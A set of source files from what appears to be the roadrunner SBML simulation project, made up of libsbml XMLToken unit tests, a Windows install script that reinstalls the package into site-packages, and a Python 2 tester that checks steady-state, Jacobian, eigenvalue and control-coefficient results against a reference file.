_dummyList[:] = []; del _dummyList _dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setAttributes2(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken(triple) nattr = libsbml.XMLAttributes() xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1") nattr.add(xt1, "val1") i = token.setAttributes(nattr) self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.isAttributesEmpty() == True ) _dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setEOF(self): token = libsbml.XMLToken() self.assert_( token.isEnd() == False ) i = token.setEOF() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isEnd() == False ) self.assert_( token.isStart() == False ) self.assert_( token.isText() == False ) _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setEnd(self): token = libsbml.XMLToken() self.assert_( token.isEnd() == False ) i = token.setEnd() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isEnd() == True ) i = token.unsetEnd() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isEnd() == False ) _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setNamespaces1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) ns = libsbml.XMLNamespaces() self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) ns.add( "http://test1.org/", "test1") i = token.setNamespaces(ns) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 1 ) self.assert_( token.isNamespacesEmpty() == False ) _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ ns ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setNamespaces2(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken(triple) ns = libsbml.XMLNamespaces() self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) ns.add( "http://test1.org/", "test1") i = token.setNamespaces(ns) self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ ns ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setTriple1(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken() i = token.setTriple(triple) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_(( "test" == token.getName() )) _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setTriple2(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken("This is text") i = token.setTriple(triple) self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestXMLToken_newSetters)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: wrappers/Python/install_roadrunner_win.py ```python import site import shutil import os.path import os def rmroadrunner(path): print('deleting roadrunner from ' + path) try: os.remove(os.path.join(path, 'roadrunner.py')) except: pass try: os.remove(os.path.join(path, 'roadrunner.pyc')) except: pass try: os.remove(os.path.join(path, '_roadrunner.pyd')) except: pass try: os.remove(os.path.join(path, '_roadrunner.so')) except: pass shutil.rmtree(os.path.join(path, 'roadrunner'), ignore_errors=True) splist = site.getsitepackages() sp = '' for s in splist: rmroadrunner(s) if s.find('site-packages') > 0: sp = s print('installing roadrunner to site packages dir: ' + sp) dst = os.path.join(sp, 'roadrunner') # src dir should be location of the roadunner package, i.e. # src directory is :c:\Users\IEUser\local\site-packages\roadrunner # need to get relative to this file as cwd may be different than # dir the file dir if its say run from desktop. cwd = os.path.dirname(os.path.abspath(__file__)) src = os.path.abspath(os.path.join(cwd, 'site-packages', 'roadrunner')) print('src directory is :' + src) print("destination directory is: " + dst) shutil.copytree(src, dst) ``` #### File: roadrunner/testing/tester.py ```python import sys import random import string import roadrunner from numpy import * import os # Module wide file handle fHandle = '' rpadding = 45 sbmlStr = '' JarnacStr = '' def defaultTestFilePath(): """ get the full path of the default data file """ me = os.path.realpath(__file__) base = os.path.split(me)[0] testfile = os.path.join(base, 'results_roadRunnerTest_1.txt') if os.path.isfile(testfile): return testfile else: raise Exception('instalation error, test file, ' + testfile + ' does not exist') # -------------------------------------------------------------------------- # SUPPORT ROUTINES # -------------------------------------------------------------------------- def expectApproximately (a, b, tol): diff = a - b return abs(diff) < tol def passMsg (errorFlag): if errorFlag: return "*****FAIL*****" else: return "PASS" # Empty lines are ignored # Lines starting with # are also ignored def readLine (): line = fHandle.readline() while line == '\n': line = fHandle.readline() while line == '': line = fHandle.readline() while (line[0] == '#') or (line == '') or (line[0] == '\n'): if line == '': return line line = fHandle.readline(); return line.strip('\n') def jumpToNextTest(): line = readLine() #line = '' #while line == '': # line = fHandle.readline().strip ('\n') while line[0] != '[': line = readLine() return line def getSBMLStr (): sbmlStr = '' line = fHandle.readline() while (line != '[END_MODEL]' + '\n'): sbmlStr = sbmlStr + line line = fHandle.readline() return sbmlStr def getJarnacStr (): JarnacStr = '' line = fHandle.readline() while (line != '[END_MODEL]' + '\n'): JarnacStr = JarnacStr + line line = fHandle.readline() return JarnacStr def loadSBMLModelFromTestFile (): testId = jumpToNextTest() if testId == '[SBML]': return getSBMLStr () def loadJarnacModelFromTestFile (): testId = jumpToNextTest () if testId == '[JARNAC]': return getJarnacStr () # ------------------------------------------------------------------------ # TESTS START HERE # ------------------------------------------------------------------------ def setConservationLaw(rrInstance, testId): line = readLine () if line == 'True': rrInstance.conservedMoietyAnalysis = True else: rrInstance.conservedMoietyAnalysis = False def mySetSteadyStateSelectionList(rrInstance, testId): line = readLine () words = line.split() rrInstance.steadyStateSelections = words def myComputeSteadyState(rrInstance, testId): line = readLine () if line == "True": print "Compute Steady State, distance to SteadyState:", rrInstance.steadyState() def checkSpeciesConcentrations(rrInstance, testId): words = [] species = [] m = rrInstance.model.getNumFloatingSpecies() for i in range (0,m): line = readLine () words = line.split() words.append (rrInstance.model[words[0]]) species.append (words) # Steady State Concentrations print string.ljust ("Check " + testId, rpadding), errorFlag = False for i in range (0,m): expectedValue = float (species[i][1]) if expectApproximately (expectedValue, species[i][2], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkFluxes(rrInstance, testId): words = [] fluxes = [] # Steady State Fluxes print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() n = rrInstance.model.getNumReactions(); for i in range (0,n): line = readLine () words = line.split() words.append (rrInstance.model[words[0]]) fluxes.append (words) for i in range (0,n): expectedValue = float (fluxes[i][1]) if expectApproximately (expectedValue, fluxes[i][2], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkFullJacobian(rrInstance, testId): # Jacobian print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() Jacobian = rrInstance.getFullJacobian() for i in range(0,m): line = readLine () words = line.split() for j in range(0,m): expectedValue = float(words[j]) if expectApproximately (expectedValue, Jacobian[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkIndividualEigenvalues(rrInstance, testId): # Eigenvalues print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() try: for i in range(0,m): line = readLine () words = line.split() eigenvalueName = words[0] realPart = rrInstance.getValue ('eigen(' + eigenvalueName + ')') realPart = float (realPart) if expectApproximately (realPart, float(words[1]), 1E-6) == False: errorFlag = True break print passMsg (errorFlag) except Exception, e: print('Unexpected error in checkIndividualEigenvalues:' + str(e)) def checkEigenvalueMatrix(rrInstance, testId): # Eigenvalues print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() eigenvalues = rrInstance.getEigenvalues() for i in range(0,m): line = readLine () words = line.split() realPart = float (words[0]) # Check if there is an imaginary part if len (words) == 1: imagPart = 0 else: imagPart= float (words[1]) if (expectApproximately (realPart, eigenvalues[i,0], 1E-6) == False) or (expectApproximately (imagPart, eigenvalues[i,1], 1E-6)) == False: errorFlag = True break print passMsg (errorFlag) def checkStoichiometryMatrix(rrInstance, testId): # Stoichiometry matrix print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() n = rrInstance.model.getNumReactions(); st = rrInstance.model.getStoichiometryMatrix() for i in range(0,m): line = readLine () words = line.split() for j in range(0,n): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkLinkMatrix(rrInstance, testId): # Link matrix print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() st = rrInstance.getLinkMatrix() for i in range(0,m): words = readLine ().split() for j in range(0,m): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkUnscaledConcentrationControlMatrix(rrInstance, testId): # Unscaled Concentration Control matrix print string.ljust ("Check " + testId, rpadding), words = [] errorFlag = False m = rrInstance.model.getNumFloatingSpecies() n = rrInstance.model.getNumReactions(); st = rrInstance.getUnscaledConcentrationControlCoefficientMatrix(); for i in range(0,m): words = readLine ().split() for j in range(0,n): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkScaledConcentrationControlMatrix(rrInstance, testId): # Unscaled Concentration Control matrix print string.ljust ("Check " + testId, rpadding), words = [] errorFlag = False m = rrInstance.model.getNumFloatingSpecies() n = rrInstance.model.getNumReactions(); st = rrInstance.getScaledConcentrationControlCoefficientMatrix(); for i in range(0,m): words = readLine ().split() for j in range(0,n): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkUnscaledFluxControlCoefficientMatrix(rrInstance, testId): # Unscaled Flux Control matrix print string.ljust ("Check " + testId, rpadding), words = [] errorFlag = False n = rrInstance.model.getNumReactions(); st = rrInstance.getUnscaledFluxControlCoefficientMatrix(); for i in range(0,n): words = readLine ().split() for j in range(0,n): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkScaledFluxControlCoefficientMatrix(rrInstance, testId): # Unscaled Flux Control matrix print string.ljust ("Check " + testId, rpadding), words = [] errorFlag = False n = rrInstance.model.getNumReactions(); st = rrInstance.getScaledFluxControlCoefficientMatrix() for i in range(0,n): words = readLine ().split() for j in range(0,n): if expectApproximately(float (words[j]), st[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkUnscaledElasticityMatrix(rrInstance, testId): # Jacobian print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() uee = rrInstance.getUnscaledElasticityMatrix() for i in range(0,m): line = readLine () words = line.split() for j in range(0,m): expectedValue = float(words[j]) if expectApproximately (expectedValue, uee[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkScaledElasticityMatrix(rrInstance, testId): # Jacobian print string.ljust ("Check " + testId, rpadding), errorFlag = False m = rrInstance.model.getNumFloatingSpecies() ee = rrInstance.getScaledElasticityMatrix() for i in range(0,m): line = readLine () words = line.split() for j in range(0,m): expectedValue = float(words[j]) if expectApproximately (expectedValue, ee[i,j], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def checkGetFloatingSpeciesIds(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getFloatingSpeciesIds() m = rrInstance.model.getNumFloatingSpecies() for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkGetBoundarySpeciesIds(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getBoundarySpeciesIds() m = rrInstance.model.getNumBoundarySpecies() for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkGetGlobalParameterIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getGlobalParameterIds() m = rrInstance.model.getNumGlobalParameters() for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkGetCompartmentIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getCompartmentIds() m = rrInstance.model.getNumCompartments() for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkReactionIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getReactionIds() m = rrInstance.model.getNumReactions(); for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkFloatingSpeciesInitialConditionIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), line = readLine () words = line.split() expected = rrInstance.model.getFloatingSpeciesInitAmountIds() print passMsg (words != expected) def checkEigenValueIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.getEigenvalueIds() m = rrInstance.model.getNumFloatingSpecies() for i in range(0,m): if words[i] != expected[i]: errorFlag = True break print passMsg (errorFlag) def checkGetRatesOfChangeIds (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() expected = rrInstance.model.getFloatingSpeciesAmountRateIds() print passMsg (expected != words) def checkSetSteadyStateSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () m = rrInstance.model.getNumFloatingSpecies() words = line.split() result = rrInstance.steadyStateSelections = words if result == False: errorFlag = True print passMsg (errorFlag) def checkGetSteadyStateSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() result = str(rrInstance.steadyStateSelections) print passMsg (result == words) def checkSetTimeCourseSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() result = rrInstance.selections = words if result == False: errorFlag = True print passMsg (errorFlag) def checkGetTimeCourseSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False line = readLine () words = line.split() result = str(rrInstance.selections) print passMsg (result == words) def checkComputeSteadyStateValues(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False list = rrInstance.steadyStateSelections ss = rrInstance.computeSteadyStateValues() words = readLine().split() for i in range (len (list)): if expectApproximately(float (words[i]), ss[i], 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkFloatingSpeciesConcentrations(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False ss = rrInstance.model.getFloatingSpeciesConcentrations() words = readLine().split() for i in range (len (ss)): if expectApproximately(float (words[i]), ss[i], 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkBoundarySpeciesConcentrations(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False ss = rrInstance.model.getBoundarySpeciesConcentrations() words = readLine().split() for i in range (len (ss)): if expectApproximately(float (words[i]), ss[i], 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkGlobalParameterValues(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False ss = rrInstance.model.getGlobalParameterValues() words = readLine().split() for i in range (len (ss)): if expectApproximately(float (words[i]), ss[i], 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkInitalFloatingSpeciesConcentations(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False ss = rrInstance.model.getFloatingSpeciesInitConcentrations() words = readLine().split() same = len(words) == len(ss) and \ len(words) == sum([1 for i,j in zip(words,ss) if expectApproximately(float (i), j, 1E-6)]) print passMsg (not same) def checkReactionRates(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False ss = rrInstance.model.getReactionRates() words = readLine().split() for i in range (len (ss)): if expectApproximately(float (words[i]), ss[i], 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkGetReactionRatesByIndex(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False words = readLine().split() n = rrInstance.model.getNumReactions() for i in range (n): value = rrInstance.model.getReactionRate (i) if expectApproximately(float (words[i]), value, 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def checkNumberOfDependentSpecies(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = int (readLine()) n = rrInstance.model.getNumDepFloatingSpecies() if n != value: errorFlag = True print passMsg (errorFlag) def checkNumberOfIndependentSpecies(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = int (readLine()) n = rrInstance.model.getNumIndFloatingSpecies() if n != value: errorFlag = True print passMsg (errorFlag) def checkInitialConditions(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False words = readLine().split() values = rrInstance.model.getFloatingSpeciesInitConcentrations() for i in range(len(words)): if expectApproximately (float (words[i]), values[i], 1E-6) == False: errorFlag = True print passMsg (errorFlag) def checkNumberOfRules(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = int (readLine()) if rrInstance.getNumRules() != value: errorFlag = True print passMsg (errorFlag) def checkGetRatesOfChange(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False words = readLine().split() values = rrInstance.model.getRatesOfChange() for i in range (len(words)): if expectApproximately (float (words[i]), values[i], 1E-6) == False: errorFlag = True print passMsg (errorFlag) def checkGetReactionRatesEx (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False inputConcs = asarray (readLine().split(), dtype=float64) values = rrInstance.getReactionRatesEx (inputConcs) outputRates = asarray (readLine().split(), dtype=float64) if not allclose (values, outputRates): errorFlag = True print passMsg (errorFlag) def checkGetRatesOfChangeEx (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False inputConcs = asarray (readLine().split(), dtype=float64) values = rrInstance.model.getRatesOfChangeEx (inputConcs) outputRates = asarray (readLine().split(), dtype=float64) if not allclose (values, outputRates): errorFlag = True print passMsg (errorFlag) def checkRateRateOfChangeByIndex(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False inputConcs = asarray (readLine().split(), dtype=float64) outputRates = asarray (readLine().split(), dtype=float64) rrInstance.setFloatingSpeciesConcentrations (inputConcs) for i in range (len (inputConcs)): value = rrInstance.getRateOfChange (i) if expectApproximately (value, outputRates[i], 1E-6) == False: errorFlag = True break print passMsg (errorFlag) # --------------------------------------------------------------------------- def setGetValues(rrInstance, IdList, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False for i in range (len(IdList)): value = random.random()*10 rrInstance.model[dList[i]] = value if expectApproximately (rrInstance.model[IdList[i]], value, 1E-6) == False: errorFlag = True break print passMsg (errorFlag) def setGetTimeStart(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = random.random ()*10 rrInstance.setTimeStart (value) if expectApproximately (rrInstance.getTimeStart (), value, 1E-6) == False: errorFlag = True print passMsg (errorFlag) def setGetTimeEnd(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = random.random ()*10 rrInstance.setTimeEnd (value) if expectApproximately (rrInstance.getTimeEnd (), value, 1E-6) == False: errorFlag = True print passMsg (errorFlag) def setGetNumberOfPoints(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False value = random.randint (1, 100) rrInstance.setNumPoints (value) if rrInstance.getNumPoints () != value: errorFlag = True print passMsg (errorFlag) def setGetTimeCourseSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False myList = rrInstance.getFloatingSpeciesIds() newList = list (myList) random.shuffle (newList) rrInstance.setTimeCourseSelectionList (newList) if rrInstance.getTimeCourseSelectionList() != newList: errorFlag = True print passMsg (errorFlag) def setGetSteadyStateSelectionList(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False myList = rrInstance.getFloatingSpeciesIds() newList = list (myList) while newList == myList: random.shuffle (newList) rrInstance.setSteadyStateSelectionList (newList) getList = rrInstance.getSteadyStateSelectionList() if getList != newList: errorFlag = True print passMsg (errorFlag) def setGetFloatingSpeciesByIndex(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False n = rrInstance.getNumFloatingSpecies() for i in range (n): value = random.random()*10 rrInstance.setFloatingSpeciesByIndex (i, value) if expectApproximately(rrInstance.getFloatingSpeciesByIndex (i), value, 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def setGetBoundarySpeciesByIndex(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False n = rrInstance.getNumBoundarySpecies() for i in range (n): value = random.random()*10 rrInstance.setBoundarySpeciesByIndex (i, value) if expectApproximately(rrInstance.getBoundarySpeciesByIndex (i), value, 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def setGetCompartmentByIndex(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False n = rrInstance.getNumCompartments() for i in range (n): value = random.random()*10 rrInstance.setCompartmentByIndex (i, value) if expectApproximately(rrInstance.getCompartmentByIndex (i), value, 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def setGetGlobalParameterByIndex (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False n = rrInstance.getNumberOfGlobalParameters() for i in range (n): value = random.random()*10 rrInstance.setGlobalParameterByIndex (i, value) if expectApproximately(rrInstance.getGlobalParameterByIndex (i), value, 1E-6) == False: errorFlag = True break; print passMsg (errorFlag) def setGetFloatingSpeciesConcentrations (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False getArray = rrInstance.getFloatingSpeciesConcentrations() setArray = zeros(len(getArray)) for i in range(len(getArray)): value = random.random()*10 setArray[i] = value rrInstance.setFloatingSpeciesConcentrations (setArray) if (setArray != rrInstance.getFloatingSpeciesConcentrations()).all(): errorFlag = True print passMsg (errorFlag) def setGetBoundarySpeciesConcentrations (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False getArray = rrInstance.getBoundarySpeciesConcentrations() setArray = zeros(len(getArray)) for i in range(len(getArray)): value = random.random()*10 setArray[i] = value rrInstance.setBoundarySpeciesConcentrations (rrInstance.PythonArrayTorrVector (setArray)) if (setArray != rrInstance.getBoundarySpeciesConcentrations()).all(): errorFlag = True print passMsg (errorFlag) def setGetInitialFloatingSpeciesConcentrations (rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False getArray = rrInstance.getFloatingSpeciesInitialConcentrations () setArray = zeros(len(getArray)) for i in range(len(getArray)): value = random.random()*10 setArray[i] = value rrInstance.setFloatingSpeciesInitialConcentrations (setArray) if (setArray != rrInstance.getFloatingSpeciesInitialConcentrations()).all(): errorFlag = True print passMsg (errorFlag) def setGetReset(rrInstance, testId): print string.ljust ("Check " + testId, rpadding), errorFlag = False values = zeros (rrInstance.getNumberOfFloatingSpecies()) for i in range (len (values)): values[i] = random.random()*10 initial = rrInstance.getFloatingSpeciesInitialConcentrations() rrInstance.setFloatingSpeciesConcentrations (values) # Should reset the floats by to the current initial condition rrInstance.reset() values = rrInstance.getFloatingSpeciesConcentrations() if(values != initial).all(): errorFlag = True print passMsg (errorFlag) def scriptTests(): print print "Testing Set and Get Functions" print "-----------------------------" setGetValues(rrInstance.getFloatingSpeciesIds(), 'Set/Get Value (Floats)') setGetValues(rrInstance.getBoundarySpeciesIds(), 'Set/Get Value (Boundary)') setGetValues(rrInstance.getGlobalParameterIds(), 'Set/Get Value (Global Parameters)') setGetValues(rrInstance.getCompartmentIds(), 'Set/Get Value (Compartments)') setGetTimeStart('Set/Get TimeStart') setGetTimeEnd ('Set/Get TimeEnd') setGetNumberOfPoints ('Set/Get Number Of Points') setGetTimeCourseSelectionList ('Set/Get Time Course Selection List') setGetSteadyStateSelectionList ('Set/Get Steady State Selection List') setGetFloatingSpeciesByIndex ('Set/Get Floating Species by Index') setGetBoundarySpeciesByIndex ('Set/Get Boundary Species by Index') setGetCompartmentByIndex ('Set/Get Compartment by Index') setGetGlobalParameterByIndex ('Set/Get Global Parameter buy Index') setGetBoundarySpeciesConcentrations ('Set/Get Boundary Species Concs') setGetFloatingSpeciesConcentrations ('Set/Get Floating Species Concs') setGetInitialFloatingSpeciesConcentrations ('Set/Get Initial Concs') setGetReset ('Set/Get Reset Method') # ------------------------------------------------------------------------ # List of tests functions = {'[Compute Steady State]': myComputeSteadyState, #[Set Steady State Selection List]': mySetSteadyStateSelectionList, '[Conservation Laws]': setConservationLaw, '[Species Concentrations]': checkSpeciesConcentrations, '[Fluxes]': checkFluxes, '[Full Jacobian]': checkFullJacobian, '[Eigenvalue Matrix]': checkEigenvalueMatrix, '[Individual Eigenvalues]': checkIndividualEigenvalues, '[Stoichiometry Matrix]': checkStoichiometryMatrix, '[Link Matrix]': checkLinkMatrix, '[Unscaled Elasticity Matrix]': checkUnscaledElasticityMatrix, '[Scaled Elasticity Matrix]': checkScaledElasticityMatrix, '[Unscaled Concentration Control Matrix]': checkUnscaledConcentrationControlMatrix, '[Unscaled Flux Control Matrix]': checkUnscaledFluxControlCoefficientMatrix, '[Scaled Concentration Control Matrix]': checkScaledConcentrationControlMatrix, '[Scaled Flux Control Matrix]': checkScaledFluxControlCoefficientMatrix, '[Floating Species Ids]': checkGetFloatingSpeciesIds, '[Boundary Species Ids]': checkGetBoundarySpeciesIds, '[Global Parameter Ids]': checkGetGlobalParameterIds, '[Compartment Ids]': checkGetCompartmentIds, '[Reaction Ids]': checkReactionIds, '[Species Initial Condition Ids]': checkFloatingSpeciesInitialConditionIds, '[Get Eigenvalue Ids]': checkEigenValueIds, '[Get Rates Of Change Ids]': checkGetRatesOfChangeIds, '[Set Steady State Selection List]': checkSetSteadyStateSelectionList, '[Get Steady State Selection List]': checkGetSteadyStateSelectionList, '[Set Time Course Selection List]': checkSetTimeCourseSelectionList, '[Get Time Course Selection List]': checkGetTimeCourseSelectionList, # '[Compute Steady State Values]': checkComputeSteadyStateValues, '[Floating Species Concentrations]': checkFloatingSpeciesConcentrations, '[Boundary Species Concentrations]': checkBoundarySpeciesConcentrations, '[Get Global Parameter Values]': checkGlobalParameterValues, '[Get Initial Floating Species Concs]': checkInitalFloatingSpeciesConcentations, '[Get Reaction Rates]': checkReactionRates, # '[Get Reaction Rate By Index]': checkGetReactionRatesByIndex, '[Number of Dependent Species]': checkNumberOfDependentSpecies, '[Number of Independent Species]': checkNumberOfIndependentSpecies, '[Get Initial Floating Species Concs]': checkInitialConditions, # '[Get Rates Of Change]': checkGetRatesOfChange, # '[Get Reaction Rates Ex]': checkGetReactionRatesEx, # '[Get Rates of Change Ex]': checkGetRatesOfChangeEx, # '[Get Rate of Change by Index]': checkRateRateOfChangeByIndex, } # ----------------------------------------------------------------------- # MAIN START ROUTINE # ----------------------------------------------------------------------- def runTester (*args): global fHandle global sbmlStr global JarnacStr if len(args) >= 1: testModel = args[0] else: testModel = defaultTestFilePath() print "Starting Tester on ", testModel fHandle = open (testModel, 'r') sbmlStr = loadSBMLModelFromTestFile () JarnacStr = loadJarnacModelFromTestFile () print "\n", "Info:"+ "\n" # Create a roadRunner instance print "Create roadRunner Instance....." rrInstance = roadrunner.RoadRunner() #rrInstance.enableLogging() info = rrInstance.getInfo() print info print # Load any initialization actions testId = jumpToNextTest() if testId == '[INITIALIZATION]': testId = jumpToNextTest () while testId != '[END_INITIALIZATION]': if functions.has_key(testId): func = functions[testId] func (rrInstance, testId) else: print 'No initialization function found for ' + testId testId = jumpToNextTest() # Load the model into RoadRunner if rrInstance.load(sbmlStr) == False: print 'Failed to load model' #print rrInstance.getLastError() raise # Now start the tests proper testId = jumpToNextTest() if testId == '[START_TESTS]': testId = jumpToNextTest() while testId != '[END_TESTS]': if functions.has_key(testId): func = functions[testId] func(rrInstance, testId) else: #getFloatingSpeciesAmountRates print string.ljust (testId, rpadding), 'NO TEST' testId = jumpToNextTest() else: print 'No Tests found' # # scriptTests() ```
{ "source": "0uO/UNMT-SPR", "score": 3 }
